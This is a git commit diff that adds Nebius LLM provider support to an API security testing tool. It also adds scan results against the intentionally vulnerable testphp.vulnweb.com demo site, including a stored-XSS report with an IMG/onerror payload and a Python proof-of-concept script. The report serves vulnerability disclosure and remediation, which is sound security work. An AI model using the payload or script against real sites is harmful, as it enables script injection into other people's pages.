feat(ai): Add support for Nebius LLM Provider

- Added NEBIUS_API_KEY parsing inside cli.py and config.py
- Reconfigured litellm inside ai_client to use custom tokenfactory API base
- Updated README and CONTRIBUTING docs with Nebius env instructions

Author: vishnurajkv

CONTRIBUTING.md

@@ -45,9 +45,13 @@ Thank you for your interest in contributing to SecNode API! This guide will help
    # Or Ollama
    export SECNODE_LLM="ollama/llama3.1"
    export OLLAMA_API_BASE="http://localhost:11434" # optional
+
+   # Or Nebius
+   export SECNODE_LLM="nebius/meta-llama/Meta-Llama-3.1-70B-Instruct"
+   export NEBIUS_API_KEY="your-nebius-key"
    ```
    Provider credentials are model-specific. `openai/*` requires `OPENAI_API_KEY`,
-   `anthropic/*` requires `ANTHROPIC_API_KEY`, and `ollama/*` can run locally without
+   `anthropic/*` requires `ANTHROPIC_API_KEY`, `nebius/*` requires `NEBIUS_API_KEY`, and `ollama/*` can run locally without
    cloud API keys. See [LiteLLM provider docs](https://docs.litellm.ai/docs/providers) for other providers.
 
 5. **Run SecNode in development mode**

README.md

@@ -30,7 +30,7 @@ SecNode API is a practical automation layer for API security testing.
 ### Requirements
 
 - Python 3.10+
-- Access to an LLM provider key (OpenAI or Anthropic)
+- Access to an LLM provider key (OpenAI, Anthropic, or Nebius)
 
 ### Install from source
 
@@ -85,8 +85,15 @@ export SECNODE_LLM="ollama/llama3.1"
 export OLLAMA_API_BASE="http://localhost:11434" # optional, defaults to localhost if omitted
 ```
 
+Or with Nebius:
+
+```bash
+export SECNODE_LLM="nebius/meta-llama/Meta-Llama-3.1-70B-Instruct"
+export NEBIUS_API_KEY="your-nebius-key"
+```
+
 Provider credentials are model-specific. `openai/*` requires `OPENAI_API_KEY`, `anthropic/*`
-requires `ANTHROPIC_API_KEY`, and `ollama/*` can run locally without cloud API keys.
+requires `ANTHROPIC_API_KEY`, `nebius/*` requires `NEBIUS_API_KEY`, and `ollama/*` can run locally without cloud API keys.
 See [LiteLLM providers](https://docs.litellm.ai/docs/providers).
 
 ## Quick Start

src/secnodeapi/ai/llm_client.py

@@ -37,6 +37,10 @@ async def call_llm(system_prompt: str, user_prompt: str, temperature: float = 0.
                 api_base = os.getenv("OLLAMA_API_BASE", "").strip()
                 if api_base:
                     completion_kwargs["api_base"] = api_base
+            elif provider == "nebius":
+                # Nebius is OpenAI-compatible and requires its specific base URL
+                completion_kwargs["api_base"] = "https://api.tokenfactory.nebius.com/v1/"
+                completion_kwargs["api_key"] = os.getenv("NEBIUS_API_KEY", "")
 
             response = await acompletion(
                 **completion_kwargs

src/secnodeapi/cli.py

@@ -267,6 +267,10 @@ def _require_provider_key(schema_only: bool) -> None:
             "OLLAMA provider selected but unavailable configuration detected. "
             "Set SECNODE_LLM=ollama/<model> and optionally OLLAMA_API_BASE."
         )
+    elif provider == "nebius":
+        message = (
+            "Provider API key required. Set NEBIUS_API_KEY for SECNODE_LLM nebius/* models."
+        )
     else:
         message = (
             "Provider API key required. Set provider-specific credentials to match SECNODE_LLM."

src/secnodeapi/config.py

@@ -25,7 +25,9 @@ def has_supported_provider_key() -> bool:
         return bool(os.getenv("OPENAI_API_KEY"))
     if provider == "anthropic":
         return bool(os.getenv("ANTHROPIC_API_KEY"))
+    if provider == "nebius":
+        return bool(os.getenv("NEBIUS_API_KEY"))
     if provider == "ollama":
         return True
 
-    return bool(os.getenv("OPENAI_API_KEY") or os.getenv("ANTHROPIC_API_KEY"))
+    return bool(os.getenv("OPENAI_API_KEY") or os.getenv("ANTHROPIC_API_KEY") or os.getenv("NEBIUS_API_KEY"))

strix_runs/testphp-vulnweb-com_0810/vulnerabilities.csv

@@ -0,0 +1,7 @@
+id,title,severity,timestamp,file
+vuln-0002,SQL Injection in /artists.php 'artist' parameter enables data exfiltration (MySQL),CRITICAL,2026-03-08 19:35:38 UTC,vulnerabilities/vuln-0002.md
+vuln-0001,Stored Cross-Site Scripting (XSS) in /guestbook.php allows arbitrary JavaScript execution,HIGH,2026-03-08 19:29:54 UTC,vulnerabilities/vuln-0001.md
+vuln-0005,Path Traversal (Local File Inclusion) in /showimage.php 'file' parameter allows arbitrary local file read,HIGH,2026-03-08 19:47:21 UTC,vulnerabilities/vuln-0005.md
+vuln-0003,Information Disclosure via Publicly Accessible Database Initialization Script at /admin/create.sql,MEDIUM,2026-03-08 19:42:11 UTC,vulnerabilities/vuln-0003.md
+vuln-0004,Reflected Cross-Site Scripting (XSS) in POST /search.php ‘searchFor’ parameter,MEDIUM,2026-03-08 19:46:31 UTC,vulnerabilities/vuln-0004.md
+vuln-0006,Reflected XSS in /hpp/params.php 'p' parameter (single and duplicate-key HPP variants),MEDIUM,2026-03-08 19:47:23 UTC,vulnerabilities/vuln-0006.md

strix_runs/testphp-vulnweb-com_0810/vulnerabilities/vuln-0001.md

@@ -0,0 +1,140 @@
+# Stored Cross-Site Scripting (XSS) in /guestbook.php allows arbitrary JavaScript execution
+
+**ID:** vuln-0001
+**Severity:** HIGH
+**Found:** 2026-03-08 19:29:54 UTC
+**Target:** http://testphp.vulnweb.com
+**Endpoint:** /guestbook.php
+**Method:** POST, GET
+**CWE:** CWE-79
+**CVSS:** 8.1
+
+## Description
+
+The guestbook feature stores and renders user-supplied message content without proper output encoding or sanitization. By submitting an HTML IMG element with an onerror handler in the message body, the application saves the payload and later serves it to every visitor of the guestbook page. When the page is viewed, the browser executes the attacker-controlled JavaScript (stored XSS).
+
+This behavior was confirmed by posting a tokenized IMG/onerror payload and observing both a DOM mutation marker placed by the script and an HTTP request triggered by the payload, demonstrating real script execution in the victim’s browser context.
+
+## Impact
+
+Exploitation enables an attacker to execute arbitrary JavaScript in the context of victim users who view the guestbook page. Practical impact includes:
+- Session hijacking, account takeover, or impersonation by exfiltrating session tokens or leveraging authenticated APIs
+- Defacement, phishing overlays, keylogging, or malware delivery via drive-by actions
+- CSRF chaining and privilege abuse by invoking sensitive in-application actions on behalf of victims
+- Persistence of the malicious payload for all future visitors until manually removed
+
+Because the payload executes for every viewer, the blast radius includes privileged operators or administrators who visit the page.
+
+## Technical Analysis
+
+Root cause
+The message body submitted to /guestbook.php is stored server-side and re-rendered into the HTML page without output encoding or HTML sanitization. As a result, attacker-controlled HTML and event handlers are inserted into the DOM and executed by browsers.
+
+Evidence collected (confirmed exploitability)
+- Stored payload submissions: POST /guestbook.php requests recorded (IDs 191 and 207) contain the IMG/onerror payload in the text parameter.
+- Runtime script execution: After submission and page reload, the DOM showed a runtime attribute set by the payload: body[xss_ts="1772997961884"].
+- Outbound indicator of execution: A browser-initiated GET /xssprobe?ts=1772997961884 was captured (request ID 193), which was issued by the payload’s onerror handler, confirming JavaScript execution.
+
+Render context
+The payload is injected into the content area of the guestbook entry (HTML table cell). Inline event handlers (onerror) are permitted and executed, indicating no sanitization and no effective CSP blocking inline script/event attributes.
+
+## Proof of Concept
+
+To reproduce manually:
+1) Navigate to http://testphp.vulnweb.com/guestbook.php
+2) In the message textarea, submit the following payload and click “add message”:
+   <img src=x onerror="document.body.setAttribute('xss_ts','1772997961884'); fetch('/xssprobe?ts=1772997961884')">
+3) Reload or revisit the guestbook page. Observe that:
+   - The payload is stored and rendered in the page markup.
+   - The browser executes the onerror handler. Evidence may include a request to /xssprobe?ts=1772997961884 and the DOM attribute body[xss_ts="1772997961884"].
+
+Notes:
+- Request IDs 191 and 207 are example POST submissions that stored the payload.
+- Request ID 193 shows the browser-initiated GET /xssprobe?ts=1772997961884 triggered by the payload, proving execution.
+
+```
+#!/usr/bin/env python3
+import time
+import requests
+from urllib.parse import urljoin
+
+BASE = "http://testphp.vulnweb.com"
+GUESTBOOK = urljoin(BASE, "/guestbook.php")
+
+def submit_payload(session: requests.Session, token: str) -> requests.Response:
+    payload = (
+        f"<img src=x onerror=\""
+        f"document.body.setAttribute('xss_ts','{token}'); "
+        f"fetch('/xssprobe?ts={token}')"
+        f"\">"
+    )
+    # Send HTML directly (server reflects it as HTML)
+    # Some servers accept raw HTML; if HTML entities are preferred, use payload above as is
+    raw_payload = f"<img src=x onerror=\"document.body.setAttribute('xss_ts','{token}'); fetch('/xssprobe?ts={token}')\">"
+
+    data = {
+        "name": "anonymous user",
+        "text": raw_payload,
+        "submit": "add message",
+    }
+    return session.post(GUESTBOOK, data=data, timeout=15, allow_redirects=True)
+
+def verify_persistence(session: requests.Session, token: str) -> bool:
+    # Fetch the guestbook HTML and look for the token within the stored payload
+    r = session.get(GUESTBOOK, timeout=15)
+    if r.status_code != 200:
+        print(f"[!] Unexpected status fetching guestbook: {r.status_code}")
+        return False
+
+    body = r.text
+    # Evidence 1: token present inside the rendered onerror payload
+    marker_in_html = (f"onerror=\"document.body.setAttribute('xss_ts','{token}')" in body) or (f"/xssprobe?ts={token}" in body)
+
+    # (Optional) If you have a capturing proxy or server logs, you can also
+    # confirm a GET /xssprobe?ts={token} occurs when the page is viewed in a real browser.
+    return marker_in_html
+
+def main():
+    s = requests.Session()
+    token = str(int(time.time() * 1000))
+    print(f"[*] Using token: {token}")
+    print(f"[*] Submitting payload to: {GUESTBOOK}")
+
+    resp = submit_payload(s, token)
+    print(f"[*] POST /guestbook.php -> {resp.status_code}")
+
+    time.sleep(1.5)
+    print("[*] Verifying stored payload presence...")
+    ok = verify_persistence(s, token)
+
+    if ok:
+        print("[+] Stored XSS confirmed. The payload with token is present in the page HTML.")
+        print(f"[+] When viewed in a browser, the onerror handler will execute and request /xssprobe?ts={token}.")
+    else:
+        print("[-] Could not find the tokenized payload in the HTML source. Try reloading or waiting a moment.")
+
+if __name__ == "__main__":
+    main()
+```
+
+## Remediation
+
+Server-side output encoding and sanitization
+1) Treat all guestbook message content as untrusted. Encode output for the HTML context using a proven, framework-native encoder. In PHP:
+   - Echo user text with: htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
+   - Do not allow inline HTML/event attributes from untrusted input unless passed through a strict HTML sanitizer (e.g., HTML Purifier) with a minimal safe allowlist and URI scheme restrictions.
+2) Remove or refuse dangerous constructs (script tags, event handlers like onerror/onload, javascript: URLs, SVG/MathML active content) if rich text is not strictly required. Prefer plain text storage and rendering.
+
+Defense-in-depth
+3) Enforce a strict Content Security Policy (CSP) to reduce XSS impact:
+   - script-src 'self' with nonces or hashes; disallow 'unsafe-inline'
+   - object-src 'none'; base-uri 'self'
+   - form-action 'self'
+4) Normalize application character encoding to UTF-8 and consistently apply encoding routines at every sink.
+5) Add server-side validation to block payloads containing HTML tags or event attributes if the feature does not require HTML.
+6) Implement security testing and regression tests to verify no stored or reflected XSS is possible in rendering paths.
+
+Operational guidance
+7) Remove any existing malicious guestbook entries from storage.
+8) After fixes, perform a focused retest to ensure that stored HTML is either safely sanitized or encoded and that CSP effectively prevents execution of inline event handlers.
+